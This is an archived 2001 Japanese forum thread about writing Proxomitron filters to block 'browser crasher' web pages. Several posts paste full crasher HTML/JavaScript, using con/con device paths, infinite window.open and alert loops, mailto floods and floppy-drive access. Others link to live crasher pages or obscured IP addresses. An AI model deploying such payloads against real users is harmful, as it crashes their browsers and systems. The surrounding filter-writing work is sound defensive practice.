5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ブラクラにProxomitronで対抗するスレ

1 :名無しさん@お腹いっぱい。:2001/08/20(月) 11:28 ID:dbxWS/6c
Local File Access KillerやProtocol Src Killer などのWebフィルタ必需。
まずはhttp://whkbrxtr.tripod.com/urajindou2.html

2 :1:2001/08/20(月) 11:35 ID:dbxWS/6c
Windows版に立てるべきだったかな?
Onload UnloaderとProtocol Src Killerで大体は防げた。

3 :名無しさん@お腹いっぱい。 :2001/08/20(月) 11:43 ID:wskWno0c
右クリに入れたリンク先チェック(http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgiに渡す)では警報

4 :名無しさん@お腹いっぱい。:2001/08/20(月) 12:22 ID:dbxWS/6c
>>3
Proxomitronを使ってわざとブラクラを踏むスレ。

5 ::2001/08/20(月) 12:54 ID:X9415Eoc
自分でもアプレットやスクリプトの開発してるから
Proxomitronで無差別フィルタはやっぱり使いづらい
やっぱりセキュリティゾーン登録を強化したいな
サーバ別じゃなくてサイト別に

6 :3:2001/08/20(月) 12:56 ID:X9415Eoc
プロキシのフィルタ作りも面白いけどね

7 :名無しさん@お腹いっぱい。 :2001/08/20(月) 13:17 ID:???
mailtoとFDDとconconのサンプル
HTMLベタで書いてあるから、JavaScript止めた位じゃ防げない
右クリJavaScriptからでなくても、オフラインでチェックできるんだけど(http://www.coara.or.jp/~tkuri/PBCC/
ま、ブラクラチェック書ける奴は、テストでブラクラも書けないと(藁
あくまでもテスト用(藁藁
そのうちこのスレもブラクラギャラリーになったりして(爆
みんなもチャレンジしてみそ

8 :名無しさん@お腹いっぱい。 :2001/08/20(月) 13:29 ID:???
>>7
ゴルァ!オフラインチェック(http://www.coara.or.jp/~tkuri/PBCC/)ダメじゃん
さ、仕事に戻ろう
あうー休みヴォケで勤労意欲が全然湧かない

9 :名無しさん@お腹いっぱい。:2001/08/20(月) 13:31 ID:dbxWS/6c
Protocol src killer の改造が必要デシタ。
どっかの行に file:| と入れると幸せになります。

10 :金玉のシワとシワ合わせて幸せ:2001/08/20(月) 13:37 ID:???
>>9
HDDに逝くのね(藁

11 :名無しさん@お腹いっぱい。:2001/08/20(月) 13:46 ID:n2pqhFZ2
モーホー発見

12 :名無しさん@お腹いっぱい。 :2001/08/20(月) 13:53 ID:???
楽しいActiveペケ
愉快なJAVAアプ

13 :名無しさん@お腹いっぱい。 :2001/08/20(月) 14:40 ID:???
うへ、戻って来て見たら全然増えてねえや
どうやら分かってない夏休み厨房は一匹だけか
程度低いな(藁

14 :名無しさん@お腹いっぱい。:2001/08/21(火) 00:02 ID:f92H0ECk
JavaScriptの無限ループは防げない?
やっぱりJavaScriptを切るしか無いのか。

15 :名無しさん@お腹いっぱい。 :2001/08/21(火) 04:17 ID:???
>JavaScriptを切る
てゆーか、
未知のサーバ=インターネット・ゾーンのレベルで、
ActiveX、JavaScript、JAVAアプレットの有効/無効を、
ダイアログ確認にしといたら?すげーウザいけどね。

16 :Bluck:2001/08/21(火) 13:50 ID:mQi8LaBk
まえ、それやってみたけどほんとにウザいよ。
完全に表示されるまで何回もダイアログボックス閉じないといけない。

17 :名無しさん@お腹いっぱい。 :2001/08/21(火) 13:56 ID:???
>>16
そりゃ本当に怪しいHPだ!
制限付きゾーンに放り込んで何もさせちゃいかん!
と思うが、まあ、そこは自己責任で。

18 :名無しさん@お腹いっぱい。 :2001/08/21(火) 15:25 ID:???
>>1
Win板は厨房ばっかで漏れも全然逝かないから、ここでいいよ。

19 :Bluck:2001/08/21(火) 21:36 ID:mQi8LaBk
>>17
なんかの公式ページとかでもいろいろごちゃごちゃしてるのあるよ。
怪しいところとは限らない。

20 :名無しさん@お腹いっぱい。 :2001/08/21(火) 22:52 ID:???
>>19
それでもウザくて表示とかに支障なけりゃ制限付きゾーン逝き。
まともそうな(?)メーカーとかベンダで、文句ねじ込めそうな所なら、信頼済みに入れる。
ちなみにウチの信頼済みサーバ37件に対して、制限付きサーバは434件(笑)。
CSV作ってレジストリにまとめて放り込む。

21 :名無しさん@お腹いっぱい。:2001/08/21(火) 23:05 ID:???
http://ynfjgt.50megs.com/mika.html
IEが落ちます。

22 :名無しさん@お腹いっぱい。:2001/08/22(水) 06:22 ID:???
スクリプトをダイアログ表示にしてるとかなり大変。

23 :___:2001/08/22(水) 09:04 ID:PQjZXKpk
JavaScript といっても危険なのは無限ループくらいだから、俺は自作フィルタで防いでる。
あとはQ2サイトでよく使われる onload、onunload、onbeforeunload あたりをつぶせばOK。
実際ブラクラは必ずクリックして確かめているけど、防げなかったのは一つも無かった。

24 :actkyo002059.adsl.ppp.infoweb.ne.jp:2001/08/22(水) 17:36 ID:Sjh4otqw
ちょっとプロキシテスト。
>>21
ブラクラチェッカーでは引っかからなかったYO!

25 :名無しさん@お腹いっぱい。 :2001/08/22(水) 19:46 ID:???
>>21
うーん、確かにブラクラチェッカーでは引っかからないけど、
ソース覗くとJavaScriptべったり。
誰か踏んでみてちょうだい。

26 :actkyo003200.adsl.ppp.infoweb.ne.jp:2001/08/23(木) 02:16 ID:???
>>21
終了するときに踏んでみようかな。

27 :actkyo003200.adsl.ppp.infoweb.ne.jp:2001/08/23(木) 02:19 ID:???
もう一回プロキシテストします。スマソ

Proxomitronでonload・onunloadとfileプロトコルへのアクセスは防げている模様。
無限ループのフィルタきぼーん。>>23

28 : :2001/08/24(金) 00:58 ID:???
http://kuma1.virtualave.net/howto/kiken/d/118.jpg

29 :名無しさん@お腹いっぱい。:2001/08/24(金) 01:24 ID:???
>>28
ブラクラ。いや、そういうスレだけど。
無限ループのフィルタがないのでキツイです。

30 :名無しさん@お腹いっぱい。:2001/08/24(金) 01:35 ID:???
Bounds = "<script*</script>"
Limit = 1024
Match = "*(for|while)*"
"&(*window.(open|scroll))"
とりあえず、こんなの使ってるよ。
関係ないのもいっぱいひっかかるが、
まぁ実害無い。

31 :山師さん:2001/08/24(金) 09:47 ID:???
age

32 :名無しさん@お腹いっぱい。:2001/08/24(金) 11:03 ID:???
>>21はリンク先がなかった・・・
>>28は途中でOSに落ちるかと聞かれた。
Win98+IE5.01+SP2+暗号強度128BIT

33 :名無しさん@お腹いっぱい。:2001/08/24(金) 12:27 ID:???
とりあえず http://kuma1.virtualave.net/howto/kiken/d/118.jpg 対策になるかな?

while対策

Name = "Kill While-Loop JavaScript"
Active = TRUE
Bounds = "(while) \([^\(\)]++\)*}"
Limit = 1024
Match = "((while) \([^><=\&\|\!\(\)]++\))\1 ({|) \2 }"
Replace = "{document.write("While-Loop Javascript found!");}"

for対策

Name = "Kill For-Loop JavaScript"
Active = TRUE
Limit = 1024
Match = "(for \([^;]++;[^><=\&\|\!;]++;[^\)]++\))\1 ({|) \2 }"
Replace = "{document.write("For-Loop Javascript found!");}"

refresh対策(Anti-Auto-Refresher改造版)

Name = "Anti-Auto-Refresher2"
Active = TRUE
URL = "^*.(jpg|jpeg|gif|png|bmp)"
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv=("|)refresh*content = ("|) ([0-9]++)\2 ((; url=("|)([^"'> ]++)\1)|) " *"
Replace = "\2seconds-refresh to <a href="\1">\1</a> killed!"

34 :名無しさん@お腹いっぱい。:2001/08/24(金) 17:19 ID:???
>>33
> refresh対策(Anti-Auto-Refresher改造版)

それだと http-equiv 属性と content 属性を逆にされたらフィルタリングできなくなるよ。
(これは細かいけど) 属性値を 0.1 とかにされても効かなくなるよ。

35 :名無し~3.EXE:2001/08/24(金) 20:57 ID:???
>>28 は、Image Checkerで防げますよ。

36 :33:2001/08/24(金) 20:57 ID:???
逆は気付いてた。一昨日それでエロサイトでrefresh食らったばかりから。
でも小数は盲点だったなあ…。

37 :34:2001/08/24(金) 23:47 ID:???
他にも

<meta http-equiv="refresh" content="1;; url=http://www.google.co.jp/">
<meta http-equiv="r&#101;fr&#101;sh" content="1; url=http://www.google.co.jp/">

…とか。2 番目の方法は実際に自分のサイトで使ってます。
Anti-Auto-Refresher が効かないように (笑
間にスペースなどの適当な文字をたくさん入れられ、
フィルタの Byte Limit を消費されてもだめです。これは
どんなに完璧に作ったとしても防げませんよね。

単なる meta refresh を防ぐフィルタでも作り込もうとすると
相当難しくなるので、ブラクラを防ぐフィルタとなると…。
余程隙を突かれない限り食らうことのないブラクラのために
どこまで通常のブラウジングを犠牲にするか。自分なりの妥協点を
見つけるのも大事だと思う。

最後に 33 さん、気分害されたなら本当にごめんなさい。

38 ::2001/08/25(土) 23:24 ID:???
ブラクラで無限JavaScriptにやられると、
Win9*系だとOSまで落ちますよね?
2000だと落ちないんでしょうか?
ちなみに、
Macだとループをストップさせられるし、
ストップさせなくても、
そのうち終わって(多分、割り当てメモリ使いきるまで)
ブラウザだけ強制終了させればすんじゃいます。

39 :38:2001/08/25(土) 23:29 ID:???
言い忘れたけど、
>>37は、OS9の話です。
OS×は使ったことないからわかんないや。
それと、
たまには、ブラクラ踏んで、
次から次に開く画面を見たいので、
激速なブラクラがあるところを教えてください。
ブックマークしておきます。

40 :名無しさん@お腹いっぱい。:2001/08/25(土) 23:31 ID:???
COSMO-GATEの認証先がブラクラ、これだとブラクラチェッカーがつかえないから恐いな…
ちなみに、COSMO-GATEはIDとパスワードによってリンク先のアドレスが分からないようにしてアクセスするCGIです。

41 :名無しさん@お腹いっぱい。:2001/08/25(土) 23:32 ID:???
無限ループに引っかかったけど、Ctrl+Alt+Delで一時停止できるので、その状態から強制終了。
Proxomitronで対抗していない。((藁

42 :38:2001/08/25(土) 23:43 ID:8FoAYjxA
>>40 タン
どこですか?
久しぶりにブラウザの花を咲かせてみたい!
>>41 タン
えっ、98でCtrl+Alt+Del で止められなかったけど。
その前にフリーズしただけだったのかな。

43 :プロクセ:2001/08/27(月) 01:23 ID:???
Proxomitronで閲覧したサイトをオフライン状態で履歴から見る時って、
やっぱjavascriptとかはまだ生きてるの?
それともproxomitronで処理したのが保存されてるのかな?

44 :名無しさん@お腹いっぱい。:01/09/02 01:43 ID:eAtUABQk
>>43
JavaScriptは殺しているかと。
駄目ならローカルにもフィルタをかければなお良い。

45 :名無しさん@お腹いっぱい。:01/09/03 06:37 ID:a5J34Q9M
>>43
当たり前だけど、
ブラウザで一回表示したキャッシュはその時表示した状態(頃したなら氏んでる)状態
直にhtmlを↓した場合はうpしてあるソースそのまま。

折れJSとActiveXはブラウザでオフにしてるからおみとろんでは何も掛けてないんだけど
そーするとキャッシュをオフラインで見た時JS関係は生きてる。
mailtoとかは全部氏んでる。

#ブラクラ踏んだ時ソース見たりしない?それで見れる氏んでるhtml
#自体は既にローカルに落ちてたモノを見てるんだから、当然と言えば当然。

46 :名無しさん@お腹いっぱい。:01/09/07 20:18 ID:URHwhxS2
age

47 :名無しさん@お腹いっぱい。:01/09/07 20:24 ID:???
>折れJSとActiveXはブラウザでオフにしてるからおみとろんでは何も掛けてないんだけど
>そーするとキャッシュをオフラインで見た時JS関係は生きてる。

これだとローカルで見たときにブラクラ食らうよね。

48 :名無しさん@お腹いっぱい。:01/09/07 20:28 ID:???
http://www2.strangeworld.org/image/sahra1725.jpg
これどうだろう?ソースが見れん。

49 :名無しさん@お腹いっぱい。:01/09/07 21:59 ID:???
>>48
404 Not Found と出るんですが・・・

50 :名無しさん@お腹いっぱい。:01/09/07 22:11 ID:???
>>49
また落ちた…3回目だ、鬱。。。

51 :名無しさん@お腹いっぱい。:01/09/11 15:24 ID:???
>>48

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=x-sjis">
<TITLE>JAVA COM</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#9276FF" ALINK="#FF0000">
<img width="1" height="1" src="file://c|/con/con/con">
<script language="JavaScript">
<!--
i = 0;
while (i < 99) {
window.open("res://ie4tour.dll/welcome.htm");
window.open('mailto:takako@seisai.net');
window.open('facecrash.htm');
i++;
}
// -->
</script>
<noscript>
<CENTER>
<font style="font-size:999pt"><a href="iecrash.html">ENTER</a></font>
</noscript>
</CENTER>
</BODY>
</HTML>

52 :Kramer:01/09/11 19:56 ID:c7OgpYyM
>>48
とりあえず、影響はなかったな。
JavaScriptも無効にしてるし。

53 :名無しさん@お腹いっぱい。:01/09/14 17:46 ID:oBD5bPO6
良スレage

54 :名無しさん@お腹いっぱい。:01/09/21 22:33 ID:cTWjc3wc
ttp://odin.prohosting.com/~fukusyu/arashi/cd_20010912/pem.html

某アイドルグループが歌ってる曲の歌詞が表示されたあと、
metaで様々な種類のブラクラを持ち合わせたページに飛ばされます。
Javaスクリプト無限ループ、alertウィンドウ出まくり、不正なProtocol src、
conconバグ、FDDアタックなどが確認されています。
このページをブロックできれば、たいていのブラクラは防げるでしょうね。

55 :名無しさん@お腹いっぱい。:01/09/22 03:07 ID:POIVTt7g
完全に撃墜成功>>54

refreshタグブロック
無限Javascriptブロック
mailtoブロック
ローカルディスクへのリンクブロック

56 :名無しさん@お腹いっぱい。:01/09/22 04:29 ID:???
結果だけ報告されても(´Д`;)

57 :名無しさん@お腹いっぱい。:01/09/22 13:45 ID:Yyuz/i4M
>>54
Alertウインドウ出まくったんで強制終了させました。
これを防ぎたいのですが、どんなフィルタを書けばいいんですか?

<SCRIPT LANGUAGE="JavaScript">
 for ( ; ; ) {
 window.alert("--------------------------------")
 }
</SCRIPT>
これだと思うんですけど・・・。

58 :名無しさん@お腹いっぱい。:01/09/22 14:08 ID:POIVTt7g
>>33のfor対策ってのがそれなんじゃない?

59 :名無しさん@お腹いっぱい。:01/09/22 14:10 ID:oNxCBvU6
>>54 のところへ行ったけど何にもならんかった。
どうやら防げているようだが良く分からない。

60 :名無しさん@お腹いっぱい。:01/09/22 14:16 ID:VxFnzQO2
すまん。スレ違いだろうけど、誰か2chに書き込んだ後の
スレッドの文字化けとスレッド一覧の文字化けを防ぐ
フィルタ持ってないでしょうか?

61 :名無し~3.EXE:01/09/22 14:29 ID:???
>>60 ここはブラクラ対策がメインだから、Win板で聞いた方が適切だと思いま
すが、Part4スレのP3-417さん作のフィルターです。一部弄っているので、オ
リジナルとは、異なります。[HTTP hearders]のフィルターです。


In = FALSE
Out = TRUE
Key = "URL: 2ch Jump htm to html (Out)"
Match = "(http://([^.]++{2,9}.2ch.net|www(2|).bbspink.com)/[^/]++{2,20}/(index(|2)|subback).htm)\1((^?)|l.gz)"
Replace = "$JUMP(\1l)"

62 :名無しさん@お腹いっぱい。:01/09/22 17:41 ID:???
>>61
ありがとう。助かったよ。スレ違いスマソ

63 :名無し~3.EXE:01/09/22 18:27 ID:???
>>54 のサイト嵐と荒しを掛けてるんだね。で、dbug使ってどのフィルターが
効いているのか、見てみたんで、書いときます。

Major Sites Ad Killer (2001/09/20)、AD Killer 1.4、Kill the worst Pop
-Up windows、Kill For-Loop JavaScript、Trinity's Protocol Killer、
Local File Access Killer、Protocol src killer (2001/07/24)

64 :名無しさん@お腹いっぱい。:01/09/22 18:57 ID:BZVj1W2s
あれ、>>54のFDアタックが防げなかった。

srcは殺してるはずなんですけど?

ソース貼って頂けないでしょうか。
>>54の先にあるブラクラ本体の方のです。

65 :名無しさん@お腹いっぱい。:01/09/22 21:03 ID:???
IE6+セキュリティ高(カスタマイズ)+Protocol Src Killer+Local File Access Killer+Anti-Auto-Refresher+無限ループ対策でもブラクラに引っかかった。
が、IEが落ちただけで何の影響もなかったけど、7どうよ?

66 :名無しさん@お腹いっぱい。:01/09/23 02:36 ID:NtgZ5.1Y
>>64
関係部分のみです。

<SCRIPT LANGUAGE="JavaScript">
 <!--
 for (i=0; i<100; ++i) {
 window.open();
 }
 -->
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
 for ( ; ; ) {
 window.alert("--------------------------------")
 }
</SCRIPT>

<IMG SRC="file:///c|/con/con"><IMG SRC="file:///c|/con/con"><IMG SRC="file:///c|/con/con">

<IMG SRC="mailto:1"><IMG SRC="mailto:2"><IMG SRC="mailto:3">
<IMG SRC="mailto:4"><IMG SRC="mailto:5"><IMG SRC="mailto:6">
<IMG SRC="mailto:7"><IMG SRC="mailto:8"><IMG SRC="mailto:9">

<IMG SRC="mailto:10"><IMG SRC="mailto:11"><IMG SRC="mailto:12">
<IMG SRC="mailto:13"><IMG SRC="mailto:14"><IMG SRC="mailto:15">
<IMG SRC="mailto:16"><IMG SRC="mailto:17"><IMG SRC="mailto:18">

<IMG SRC="mailto:19"><IMG SRC="mailto:20"><IMG SRC="mailto:21">
<IMG SRC="mailto:22"><IMG SRC="mailto:23"><IMG SRC="mailto:24">
<IMG SRC="mailto:25"><IMG SRC="mailto:26"><IMG SRC="mailto:27">

<IMG SRC="mailto:28"><IMG SRC="mailto:29"><IMG SRC="mailto:30">
<IMG SRC="mailto:31"><IMG SRC="mailto:32"><IMG SRC="mailto:33">
<IMG SRC="mailto:34"><IMG SRC="mailto:35"><IMG SRC="mailto:36">

<IMG SRC="a:\1.jpg"><IMG SRC="a:\2.jpg"><IMG SRC="a:\3.jpg">
<IMG SRC="a:\4.jpg"><IMG SRC="a:\5.jpg"><IMG SRC="a:\6.jpg">
<IMG SRC="a:\7.jpg"><IMG SRC="a:\8.jpg"><IMG SRC="a:\9.jpg">

<//--><//"--> </BODY>

67 :64:01/09/23 03:51 ID:lVQY8WzM
ありがとうございます。>>66

conconに引っ掛かるわけはないんで、
<IMG SRC="a:\1.jpg">の部分で、自分はやられたんだと思います。

Protocol Src Killer+Local File Access Killerでこの部分は防げないのでしょうか?

68 :67:01/09/23 04:28 ID:lVQY8WzM
>>66
とりあえず、自分でProtocol Src Killerにa:\を追加しました。
どうもでした。

69 :名無しさん@お腹いっぱい。:01/09/23 04:29 ID:???
オイラ単純に
<IMG SRC*a:*>
をターゲットにしてるけどそれじゃダメなんかなぁ?
だってローカルのAドライブにアクセスする必要ないし。

70 :名無し~3.EXE:01/09/23 11:02 ID:???
>>67 Trinity's Protocol Killerで防げますよ。

71 :名無しさん@お腹いっぱい。:01/09/23 13:37 ID:nud4pauY
とりあえずローカルへのアクセス全滅(多分)フィルタ

Name = "Local href_src killer"
Active = TRUE
Bounds = "<*>"
Limit = 256
Match = "<[^>]++(href|src)=("|)((file|[a-z]):[^ >"']+)\1 * >"
Replace = "<font size=1>[localfile \1]</font></a>"

72 :名無しさん@お腹いっぱい。:01/09/23 21:01 ID:n7rv3pfA
>>71

ありがとうございました。
Protocol Src Killerにaからzまで追加する手間が省けました。

今、ふと思ったんですが、<IMG SRC="a:\〜">で、"a"のところが"g"
などになっていて、そこに仮想ドライブを割り当てていた場合、マシンは
どういう反応をするんでしょうか。

愚問でした。

73 :名無しさん@お腹いっぱい:01/09/23 21:27 ID:???
http://www.geocities.co.jp/Bookend-Ohgai/1361/tura/sinrei.jpg

74 :名無しさん@お腹いっぱい。:01/09/23 23:20 ID:PQGYVymU
ネットスケープだと<IMG SRC="a:\1.jpg">ではやられないね。

75 :名無しさん@お腹イパーイ:01/09/23 23:43 ID:???
>>1
R焼き&WinMX使用中に踏んでしまった。鬱。

…でも、ネスケ&Win2000&P3/1GHz&RAM512MBのおかげで助かった。
IEだったらたぶん焼きミスってる。

76 :75:01/09/23 23:47 ID:???
とりあえずProxomitronを入れてみる事にした。
そんな自分はまさに>>1の思惑通り?

77 :1:01/09/24 00:24 ID:ZF31Fpjs
>>76
   / ̄ ̄ ̄ ̄ ̄ ミ
  /   ,――――-ミ
 /  /  /   \ |
 |  /   ,(・) (・) |
  (6       つ  |
  |      ___  |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |      /__/ /  < 困惑通り。なわけねえだろ!
/|         /\   \__________

78 :名無しさん@お腹いっぱい。:01/09/24 01:00 ID:???
>>76,>>77
どっかで見たことそのまま書いとく。

初心者IE
知ったか中級者ネスケ
上級者IE+オミトロン(+タブブラウザ)

79 :名無しさん@お腹いっぱい。:01/09/24 09:36 ID:???
>>78
漏れはIE+Proxomitron。
タブブラウザは発想は面白いが、IEの使い勝手がないから使ってない。
そういう意味ではfubはけっこういいかと。

80 :名無しさん@お腹いっぱい。:01/09/26 15:34 ID:???
<html>

<head>
<title>Beyond The Net</title>
</head>
<body>

<p><img src="JavaScript:resizeTo( 100, 100 );setInterval( 'moveTo( Math.random() * screen.width, Math.random() * screen.height )', 50 );"></p>

</body>
</html>

81 :名無しさん@お腹いっぱい。:01/09/26 23:11 ID:cSR9M.Js
Name = "BrowserCrasher FUCK"
Active = TRUE
Bounds = "<*>"
Limit = 2048
Match = "<*file://*>|<*?\\*>|<*mailto:**>|"
Replace = "<!-- BrowserCrasher -->"

始めて作ったやつなんだが、
かなり誤爆しそう(鬱

82 :81:01/09/27 00:09 ID:???
ってできてないし
逝ってこよう

83 :名無しさん@お腹いっぱい。:01/09/27 03:34 ID:???
Mozilla+おみとろん ですが何か?

84 :名無しさん@お腹いっぱい。:01/09/28 08:10 ID:???
これってオミトロンって読むんだ。知らんかった・・・。

85 :名無しさん@お腹いっぱい。:01/09/30 00:39 ID:zsg8k9ec
Java Scriptの無限ループ対策フィルタを!

86 :名無しさん@お腹いっぱい。:01/09/30 01:45 ID:G3TwicaI
>>30はそうだろ?

87 :名無しさん@お腹いっぱい。:01/09/30 01:47 ID:G3TwicaI
>>33モナー。

88 :名無しさん@お腹いっぱい。:01/09/30 01:55 ID:???
Bounds = "<script*</script>"
Limit = 1024
Match = "*(for|while)*"
"&(*window.(open|scroll|alert))"

こうやって、>>54に対策したいのですが、
問題ありますか?

89 :名無しさん@お腹いっぱい。:01/09/30 01:56 ID:???
>>87
どっちが良くて、どう違うんですか?

90 :名無しさん@お腹いっぱい。:01/09/30 02:18 ID:G3TwicaI
>>30は置き換えがしてないので未完成かな?

>>33は個別に対応している。

どっちがいいとも・・・
分からないのなら>>33にしとけば?
俺もMatchの文法は良く分からん。

詳しい方、解説お願いします。

91 :名無しさん@お腹いっぱい。:01/09/30 02:23 ID:???
http://www.interq.or.jp/ox/satake/present/gaku0.jpg

92 :名無しさん@お腹いっぱい。:01/09/30 02:47 ID:zsg8k9ec
>>71入れてるんだけど、>>91でゴーーーーっとa:がアクセスされる。
なんで?

93 :ソース(一部"削除"):01/09/30 02:58 ID:G3TwicaI
<HTML>
<head>
<title>
氏ね!
</title>
</head>
<body>

<img src="file://c:\windows\con\con\con">
<img src="file://c:\windows\prn\prn\prn">

<img src="mailto:omeko0@dot.com>
<img src="mailto:omeko1@dot.com>
<img src="mailto:omeko2@dot.com>
<img src="mailto:omeko3@dot.com>
<img src="mailto:omeko4@dot.com>
<img src="mailto:omeko5@dot.com>
<img src="mailto:omeko6@dot.com>
<img src="mailto:omeko7@dot.com>
<img src="mailto:omeko8@dot.com>
<img src="mailto:omeko9@dot.com>
<img src="mailto:omekoa@dot.com>
<img src="mailto:omekob@dot.com>
<img src="mailto:omekoc@dot.com>
<img src="mailto:omekod@dot.com>
<img src="mailto:omeko00@dot.com>
<img src="mailto:omeko01@dot.com>
<img src="mailto:omeko02@dot.com>
<img src="mailto:omeko03@dot.com>
<img src="mailto:omeko04@dot.com>
<img src="mailto:omeko05@dot.com>
<img src="mailto:omeko06@dot.com>
<img src="mailto:omeko07@dot.com>
<img src="mailto:omeko08@dot.com>
<img src="mailto:omeko09@dot.com>
<img src="mailto:omeko0a@dot.com>

<img src="file://a:\windows\con\con\con">
<img src="file://a:\windows\prn\prn\prn">
<img src="file://a:\windows\con\con\con">
<img src="file://a:\windows\prn\prn\prn">

<img src="file://a:a.jpg">
<img src="file://b:a.jpg">
<img src="file://c:a.jpg">
<img src="file://d:a.jpg">
<img src="file://e:a.jpg">
<img src="file://f:a.jpg">


</body>

94 :名無しさん@お腹いっぱい。:01/09/30 03:36 ID:tBPFRFK6
何でだろう???

テストではきっちり殺せるのに???

スキルの有る方、どうかご教授願えないでしょうか。

95 :名無しさん@お腹いっぱい。:01/09/30 03:38 ID:tBPFRFK6
Protocol Src Killer+>>71
で殺せるはずなんですが???

不思議だ???

96 :名無しさん@お腹いっぱい。:01/09/30 03:59 ID:???
ちゃんとjpgにもフィルタ効くようにしてるのか?

97 :名無しさん@お腹いっぱい。:01/09/30 04:19 ID:whGjce7E
どういうことでしょうか?

 URLのjpgと関係があるのでしょうか?

 <img src="file://a:a.jpg">
 のjpgは、src”file:で殺してるんですけど?

 全然私、分かってないのかも・・・

98 :名無しさん@お腹いっぱい。:01/09/30 09:52 ID:???
>>92-97
ttp://www.pluto.dti.ne.jp/~tengu/proxomitron/newfilters.html
ここのLocal File Access Killerを使えばいいんじゃないノカー?

99 :名無しさん@お腹いっぱい。:01/09/30 10:22 ID:a5Bb.yHo
>>91のURLは末尾がjpgになっています。proxomitronはこういうファイルには原則として
フィルターをかけませんのでモロに食らいます。
>>96のいうとおり、jpg等にもフィルターがかかるように設定しなければなりません。

http://yasai.2ch.net/test/read.cgi?bbs=win&key=994101139
の248以降で話が出ています。キーワードは
Filter image extension
Image Checker
です。普通のhtmlのブラクラは>>71で当然殺せます。

100 :名無しさん@お腹いっぱい。:01/09/30 12:32 ID:tsv.GZkA
>>91
ネットスケープだと無反応だ。
どうやら拡張子がjpgのは素直にJPEGファイルとして認識して、HTMLを解釈しないようだ。

101 :名無しさん@お腹いっぱい。:01/09/30 12:37 ID:/k3rUZ3Q
>>99
Image Checker は見つかったのですが、Filter image extension が見つかりません。

試しにImage Checker だけで飛んでみたらやっぱりダメでした。
多分ヘッダをなんとかしないとだめなんですね。

恥を忍んでお願いします。
Filter image extensionの書式をこちらに書き込んで頂けないでしょうか。
済みません。

102 :名無しさん@お腹いっぱい。:01/09/30 13:38 ID:???
バッチリ対抗できますね。
http://3533637102/

103 :名無しさん:01/09/30 13:54 ID:???
>>101

Content-Type text/plain用のフィルター
In = TRUE
Out = FALSE
Key = "Content-Type: Filter text/plain"
Match = "text/plain"
Replace = "text/plain$FILTER(true)"

バイト制限無いタイプ
In = TRUE
Out = FALSE
Key = "URL: Filter image extension"
URL = "*.(jpg|jpeg|gif|png|bmp)"
Match = "$FILTER(true)"

50Kバイト以下の画像用
In = TRUE
Out = FALSE
Key = "URL: Filter image extension [P] [08.04.R2.2001]"
URL = "*.(jpg|jpeg|gif|png|bmp)"
Match = "$IHDR(Content-Length: [#0-51200]$FILTER(true))"


Image Checker After入れておかないと、画像が壊れたりしますよ。

104 :名無しさん@お腹いっぱい。:01/09/30 14:10 ID:???
102
いまさらNimdaかよ!

105 : :01/09/30 14:18 ID:???
http://3403692948/menu.html

106 : :01/09/30 14:20 ID:???
http://3534520340/ox/satake/present/gaku0.jpg

107 :名無しさん@お腹いっぱい。:01/09/30 14:27 ID:???
Image checkerとFilter image extension入れたけど、やられちゃうよ。
どうして?

108 :名無しさん:01/09/30 15:05 ID:???
>>107 Trinity's Protocol Killer,Protocol src killer (2001/07/24),
Local File Access Killerとか使ってますか?

109 :名無しさん@お腹いっぱい。:01/09/30 15:07 ID:???
>>108
Protocol src killer (2001/07/24)と>>71を使ってます。

110 :名無しさん@お腹いっぱい。:01/09/30 20:02 ID:a5Bb.yHo
以下のフィルターを入れてから>>91を見て、茶色の枠に囲まれたブラクラのソースが
表示されればOK。

[HTTP headers]
In = TRUE
Out = FALSE
Key = "URL: Filter image extension"
URL = "*.(jpg|jpeg|gif|png|bmp)"
Match = "$FILTER(true)"

[Patterns]
Name = "Image Checker [P] [08.07.2001]"
Active = TRUE
Bounds = "<*>"
Limit = 115
Match = "$IHDR(Content-Type: image/(jpeg|gif|png|bmp))&(*(html|head|title|body|script|img|src|href|file|style|link)*)"
Replace = "<html>\n"
"<head>\n"
"<title>HTML Content Found! : \u</title>\n"
"</head>\n"
"<body bgcolor="maroon">\n"
"<center><br>\n"
"<font color="yellow" size="5"><b>HTML Content Found!</b></font><br><br>\n"
"<font color="white" size="4">\u</font><br><br>\n"
"<iframe src="http://bweb..src..\u" width="100%" height="100%" frameborder="0"></iframe>\n"
"</center>\n"
"</body>\n"
"</html>\n"
"\k"

Name = "Image Checker After"
Active = TRUE
Limit = 50
Match = "$IHDR(Content-Type: image/(jpeg|gif|png|bmp))&(*)\0"
Replace = "\0"

111 :名無しさん@お腹いっぱい。:01/09/30 20:54 ID:???
>>110
おお!できました!
最後のImage Checker Afterってのは何をしてるんですか?

112 :名無しさん:01/09/30 21:16 ID:???
>>111 >>103 に書いたが、Image Checker Afterは、画像の壊れを防止する為
のフィルター。

113 :名無しさん@お腹いっぱい。:01/09/30 22:18 ID:???
>>112
Afterは一生懸命反応してるけど画像が壊れちゃう。

114 : :01/09/30 22:33 ID:???
http://3403692948/

115 :名無しさん:01/09/30 22:43 ID:???
>>113 キャッシュをクリアしてますよね?もし、クリアしてないなら、一旦
クリアしてから、再度、画像壊れるページを開いて下さい。

Part4スレで、画像化け問題は解決しているようなんで、なんで化けるのか
不思議ですね。
http://yasai.2ch.net/test/read.cgi/win/994101139/451-500n

116 :名無しさん@お腹いっぱい。:01/09/30 23:28 ID:???
>>115
ええ、キャッシュじゃないです。
Part4スレを参考にImage CheckerとAfterを一番上に持ってきたら壊れなくなりました。ありがと!

117 :名無しさん@お腹いっぱい。:01/09/30 23:33 ID:???
Afterなしでも壊れないけど、なんで?

118 :名無しさん:01/09/30 23:43 ID:???
>>117 画像壊れないのは、ラッキーだと思いますよ。それと、全部の画像が壊れ
るわけじゃないよ。全員、同じ画像が壊れるのか分からないし、環境によって壊
れる、壊れないって違いが出るのかも知れない。

119 :名無しさん@お腹いっぱい。:01/10/01 00:35 ID:???
ブラクラ探ししてたけど、なかなか見つからない。
死体画像とか踏んじゃって、気持悪い・・・

120 :名無しさん@お腹いっぱい。:01/10/01 01:46 ID:???
つーか何も直にふまんでもtestすりゃ良いだけの物も多いと思うが。

